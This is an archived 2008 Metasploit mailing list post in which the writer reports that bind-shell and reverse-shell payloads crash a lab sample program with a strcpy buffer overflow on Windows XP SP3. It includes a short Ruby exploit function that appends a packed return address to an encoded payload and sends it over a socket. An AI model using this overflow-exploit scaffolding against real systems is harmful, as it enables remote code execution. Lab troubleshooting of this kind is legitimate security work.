Metasploit mailing list archives
MSF and Windows SP3
From: security at vahle.de (Thomas Werth)
Date: Mon, 02 Jun 2008 09:30:29 +0200
Dear List,
i've been playing around with xp sp3. I've used a small sample programm
having a buffer overflow (strcpy into 256 sized buffer).
Now when using exploits (bind_shell, reverse_shell) program is abnormal
terminated.
In Bindshell example the shell is created and listens on target. But
when connection occurs program crashes, same for reverse shell ...
This is demo exploit function, Payload Space is set to 260 so target
adress will overwrite bytes from 261-264 and will set new saved_eip
def exploit
connect
sploit = payload.encoded + [target.ret].pack('V')
print_status("Trying target #{target.name}...")
print_status (sploit)
print_status (sploit.size)
sock.put(sploit)
handler
disconnect
end
Anyone having same problems with xpsp3 ?
greetings
Thomas
Current thread:
- MSF and Windows SP3 Thomas Werth (Jun 02)
